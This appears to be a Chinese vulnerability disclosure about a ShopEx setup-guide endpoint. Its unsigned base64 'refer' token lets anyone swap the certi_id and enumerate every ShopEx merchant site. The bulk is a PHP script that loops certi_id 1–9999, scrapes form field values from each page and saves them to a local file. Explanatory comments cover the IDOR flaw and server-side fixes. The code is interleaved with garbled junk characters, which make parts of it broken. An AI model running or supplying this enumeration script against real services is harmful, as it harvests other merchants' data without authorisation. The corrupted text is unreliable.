简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php5 M& t- g9 ~( n C% u" q
+ l3 i0 D. n7 Y
// Driver loop: calls ShowshopExD() for certi_id 1..9999 in order.
// The id is a small, predictable integer that the guide endpoint accepts
// without any session binding, which is exactly what makes it enumerable
// (an insecure-direct-object-reference pattern). Server-side fix: tie the
// id to the authenticated merchant session and rate-limit the endpoint;
// detection: a single client walking sequential certi_id values.
for ($i=1; $i < 10000; $i++) { // enumerate
9 K; q. f8 I7 u! C; q3 d$ x- K0 P9 u/ @+ l* A* l
ShowshopExD($i); \7 y! M4 o2 X4 N+ c v6 e- G0 K
' [! X5 m% d: I" \. ~) R n4 i9 } }: L* f; O3 O& c9 t2 V) I( v+ E
! w `7 b* M9 G/ q; T j6 _$ S
// Fetch the ShopEx setup-guide page (step2.php) for one certi_id and, when
// the page reflects the supplied refer token back, print and append to a
// local file every <input type="text"> name/value pair found in it.
//
// Reviewer note on the weakness being demonstrated: `refer` is plain
// base64 of a JSON object carrying certi_id and callback_url. There is no
// signature and no session binding, so the server has no way to tell a
// forged certi_id from a legitimate one. The mitigation is server-side:
// derive certi_id from the authenticated merchant session instead of the
// token (or sign the token, e.g. with an HMAC under a server-held key, and
// verify it before use), and rate-limit the endpoint.
//
// @param int|string $cid  certificate id; passed through intval() before
//                         being embedded in the token.
// @return void  Output goes to stdout via echo and, on a match, to
//               c:/shopEx.txt in append mode. No error checking is done on
//               curl_exec() or fopen().
function ShowshopExD($cid) {
1 `0 Y. v$ W0 S3 \) [5 P L+ s1 f) B7 ^6 y7 `
$url='http://guide.ecos.shopex.cn/step2.php';
: w5 E- G: j/ D7 @. D& c$ C: R9 y2 }& N
// Token is base64(JSON) with no integrity protection; intval() only keeps
// the id numeric, it does not authorize it.
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');: m: Y: y0 i' c! t+ Z
2 l: E9 P# r$ B# o2 v $url = $url.'?refer='.$refer;0 w4 s4 m. S/ x. f; h/ Y s( ?
5 [+ h7 x+ C" _: s7 B' k $ch = curl_init($url);3 E! D' |$ p) w+ c0 q3 S6 r
/ I) A/ Y4 N9 _4 L0 e* C* w
// Return the body from curl_exec() instead of writing it to stdout.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
" {- x8 e% O, w- J8 w
// CURLOPT_BINARYTRANSFER has had no effect since PHP 5.1.3; harmless here.
3 l, p6 f3 S" U/ U curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
4 ]7 X- h1 u5 M. X+ U0 Z4 R2 v; t
% n/ l. j' |) H. P; X* z. |5 d $result = curl_exec($ch);
?) \) R" }9 ~. X6 m
// Re-encodes UTF-8 to GB2312 — presumably for a Chinese-locale console;
// note the regexes below then run against the re-encoded text.
/ J* n. z1 _1 k) P/ }" W$ G $result = mb_convert_encoding($result, "gb2312", "UTF-8");
D' d) D8 p& {4 W/ p H" O( `( x) Q
// Count the page as a hit only when it echoes the refer token back.
if(strpos($result,$refer))3 w, U: O8 z3 t7 x
; g) ]- ~7 }: ]7 R2 D g7 R. ^
{
. Z4 z# l. D& I
- |# A$ u' y& T7 j4 H" c C $fp = fopen("c:/shopEx.txt",'ab'); // save to file
7 |$ e7 \# t4 E9 D6 v9 }
// Collect the attribute text of every self-closing <input type="text" .../>.
- G( b3 G1 }4 N9 {& s preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
: {' R0 w O; S! {1 z& C1 E8 `* y+ Z
+ @9 n+ N- \+ S" A! i; y3 ]' s foreach ($value[1] as $key) {
2 L. n7 M9 R, @6 v2 T1 C. G( [) e8 @1 ~
// First name="…" / value="…" pair; the regex assumes name precedes value.
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);, Z' z* ?! q1 P* `% l1 U# _
1 y2 B* N' b8 R3 j echo $res[1][0].':'.$res[3][0]."\r\n";
& ]8 @, X' W/ U7 l% A9 r" E6 ~6 h9 w* _: }$ [, I
$col =$res[1][0].':'.$res[3][0]."\r\n"; 7 J1 z8 `2 w t/ b
0 ~# `/ x( o! b' l6 Y4 X9 [2 k# j fwrite($fp, $col, strlen($col));
- n7 i$ f6 K% h# T$ h% Q$ g+ g/ F0 A8 Y+ k6 ?# U
}$ p: F$ V1 Z$ |6 {, _
5 N! R$ a5 j, ^) F* `8 P
// Separator between records of different ids.
echo '--------------------------------'."\r\n";
$ l$ h ~: v7 N; f7 d. H& q6 }% R. x% B8 u6 C9 Z1 O2 ^1 z* X
fclose($fp);
. h+ q- N0 r1 \: A" G3 M4 d. E0 l
$ g; a" A4 O( n8 ~5 w. _ }
8 F% b/ ^7 v& O, J X2 O
8 Z; B% B3 L7 Z: E& P flush();+ P& W4 B) \) D
8 h( O& o) w" Q L curl_close($ch);
P1 ?6 R; d( x) n \( c, h6 V9 g7 d" i8 i4 J
}
4 x/ b$ ]* ~' [9 F
& h, Z1 d% `6 b0 h. [?>, w$ c' c# Z4 v# w6 l7 C5 s1 i/ f. W7 e
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式